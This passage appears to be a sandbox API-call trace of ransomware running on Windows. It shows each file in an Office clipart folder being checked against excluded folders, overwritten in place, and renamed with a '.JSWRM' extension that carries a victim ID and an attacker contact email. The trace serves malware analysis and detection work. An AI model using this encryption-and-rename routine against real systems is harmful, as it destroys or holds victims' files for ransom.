hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2610, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099175.WMF", cAlternateFileName="")) returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2=".") returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="..") returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="...") returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="windows") returned -1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="recovery") returned -1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="perflogs") returned -1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="documents and settings") returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="system volume information") returned -1 [0079.870] lstrcmpiW (lpString1="J0099175.WMF", lpString2="msocache") returned -1 [0079.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0079.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099175.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099175.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099175.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099175.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099175.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099175.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0079.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.872] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9744) returned 1 [0079.872] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2610) returned 0x24d210 [0079.872] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2610, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2610, lpOverlapped=0x0) returned 1 [0079.874] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.875] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2610, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2610, lpOverlapped=0x0) returned 1 [0079.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.875] CloseHandle (hObject=0x314) returned 1 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0079.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0079.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0079.875] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0079.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.875] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099175.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099175.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0079.876] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099176.WMF", cAlternateFileName="")) returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2=".") returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="..") returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="...") returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="windows") returned -1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="recovery") returned -1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="perflogs") returned -1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="documents and settings") returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="system volume information") returned -1 [0079.876] lstrcmpiW (lpString1="J0099176.WMF", lpString2="msocache") returned -1 [0079.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099176.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099176.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099176.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.876] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099176.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099176.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099176.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.877] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2488) returned 1 [0079.877] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.877] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9b0) returned 0x20c6c0 [0079.877] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x9b0, lpOverlapped=0x0) returned 1 [0079.888] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.888] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x9b0, lpOverlapped=0x0) returned 1 [0079.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0079.889] CloseHandle (hObject=0x314) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0079.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.889] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.889] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.889] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.890] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x150a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099177.WMF", cAlternateFileName="")) returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2=".") returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="..") returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="...") returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="windows") returned -1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="recovery") returned -1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="perflogs") returned -1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="documents and settings") returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="system volume information") returned -1 [0079.890] lstrcmpiW (lpString1="J0099177.WMF", lpString2="msocache") returned -1 [0079.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099177.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099177.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099177.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099177.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099177.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099177.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0079.890] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.890] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0079.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.891] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5386) returned 1 [0079.891] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.891] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1500) returned 0x205850 [0079.891] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1500, lpOverlapped=0x0) returned 1 [0079.893] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.893] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1500, lpOverlapped=0x0) returned 1 [0079.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.893] CloseHandle (hObject=0x314) returned 1 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0079.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0079.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0079.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.894] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099177.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099177.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0079.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0079.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0079.894] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe0a7b88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe0a7b88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe0a7b88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe16, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099178.WMF", cAlternateFileName="")) returned 1 [0079.894] lstrcmpiW (lpString1="J0099178.WMF", lpString2=".") returned 1 [0079.894] lstrcmpiW (lpString1="J0099178.WMF", lpString2="..") returned 1 [0079.894] lstrcmpiW (lpString1="J0099178.WMF", lpString2="...") returned 1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="windows") returned -1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="recovery") returned -1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="perflogs") returned -1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="documents and settings") returned 1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="system volume information") returned -1 [0079.895] lstrcmpiW (lpString1="J0099178.WMF", lpString2="msocache") returned -1 [0079.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0079.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099178.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099178.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099178.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0079.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0079.895] WideCharToMultiByte (in: 